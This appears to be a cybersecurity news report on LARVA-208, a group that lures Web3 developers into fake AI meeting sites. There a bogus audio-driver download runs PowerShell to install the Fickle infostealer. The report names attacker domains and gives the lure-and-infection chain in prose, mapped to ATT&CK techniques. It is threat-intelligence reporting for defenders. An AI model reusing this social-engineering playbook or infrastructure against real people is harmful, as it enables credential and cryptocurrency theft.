New Web3 Phishing Scam Uses Fake AI Platforms to Steal Credentials

The threat actor group LARVA-208, notorious for phishing attacks and social engineering against English-speaking IT staff, has pivoted to targeting Web3 developers.

Employing spearphishing links (T1566.002), the group lures victims with fabricated job offers or portfolio review requests, directing them to counterfeit AI workspace platforms.

These deceptive sites, such as the domain norlax.ai (T1583.001), mimic legitimate services like Teampilot.ai to build credibility.

Phishing Targets Web3 Developers

Once engaged, victims receive unique invitation codes and emails, leading to simulated meeting environments where audio issues prompt the download of malware disguised as a Realtek HD Audio Driver (T1036.005).

Execution of this malicious file triggers an embedded PowerShell command (T1059.001) that connects to command-and-control (C2) servers (T1583.004), retrieving and deploying the Fickle infostealer.

This malware systematically exfiltrates sensitive data, including device names, hardware specifications, OS versions, geolocation via IP addresses, installed programs, running processes, and user credentials, transmitting it back to the attacker’s infrastructure (T1041).

LARVA-208 acquires its phishing and C2 domains through FFv2’s bulletproof hosting services, often shared with the Luminous Mantis group, leading to attribution overlaps in the cybersecurity community.

The campaign’s ingenuity lies in two primary infection vectors. In the first, attackers distribute meeting links on social platforms like X (formerly Twitter) and Telegram to developers interested in blockchain and Web3 topics, framing them as interview opportunities.

The second exploits job applications on platforms like Remote3.co for Crypto Analyst roles; here, initial legitimate Google Meet sessions transition to sharing malicious Norlax AI links via chat, circumventing platform warnings against suspicious downloads.

Upon joining the fake call, victims encounter engineered audio driver errors, prompting the download from audiorealtek.com’s /getfile.php endpoint.

The installer, while displaying a benign interface, covertly executes PowerShell from setup.dll (T1204.002), fetching Fickle from C2 domains like cjhsbam.com.

Evolution of Tactics

This operation marks an evolution from LARVA-208’s prior methods, which involved tricking victims into downloading .LNK files that masqueraded as legitimate Windows Script Files (e.g., manage-bde.wsf) but appended hidden PowerShell commands using the ampersand operator to download payloads from servers like bitacid.net.

Now, data exfiltration leverages text storage sites such as Filebin (T1567.003) for record-keeping, while key victim details OS, username, IP, geolocation, and antivirus information are relayed to notify.php on C2 servers via web protocols (T1071.001).

According to Catalyst Report, in advanced setups, collected intelligence is uploaded to actor-controlled SilentPrism servers for real-time monitoring.

The campaign underscores LARVA-208’s adaptation to emerging trends, weaponizing AI tools to exploit Web3 developers’ trust in collaborative platforms.

By harvesting cryptocurrency wallets, development credentials, and project data, the group shifts from ransomware-focused monetization to data resale on illicit markets.

This highlights vulnerabilities in high-value environments, where traditional defenses falter against socially engineered infostealers like Fickle.

Cybersecurity experts recommend verifying domain authenticity, avoiding unsolicited downloads, and employing endpoint detection for PowerShell anomalies to mitigate such threats.

Get Free Ultimate SOC Requirements Checklist Before you build, buy, or switch your SOC for 2025 - Download Now